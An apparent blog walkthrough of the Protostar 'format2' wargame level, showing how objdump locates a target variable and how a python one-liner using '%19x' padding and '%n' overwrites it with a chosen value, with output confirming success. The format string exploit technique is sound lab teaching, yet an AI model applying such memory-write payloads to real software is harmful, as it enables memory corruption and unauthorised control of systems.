About:
This level moves on from format1 and shows how specific values can be written in memory. (link)
Source Code:
This one looks very similar to the last one except we now have to write a specific value to target.
Same as before, we can get the address of target with objdump:
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep "target"
080496e4 g O .bss 00000004 target
Now that we have the correct address, let's try what we had from before, except subsituting in the new address for target:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%08x.'*3 + '%n'" | /opt/protostar/bin/format2
00000200.b7fd8420.bffff5e4.
target is 31 :(
The key to getting it to write the value of your choice is knowing that %n will write the total number of bytes read so far.
If we use the format string "%19x.", this takes up 20 bytes (19 for the value + 1 for the '.' character). If we do that three times + the original 4-byte address, we will have used 64 bytes.
Running that with a %n tagged on the end gives you this:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%19x.'*3 + '%n'" | /opt/protostar/bin/format2
200. b7fd8420. bffff5e4.
you have modified the target :)
Done!
Great, Thanks !
ReplyDelete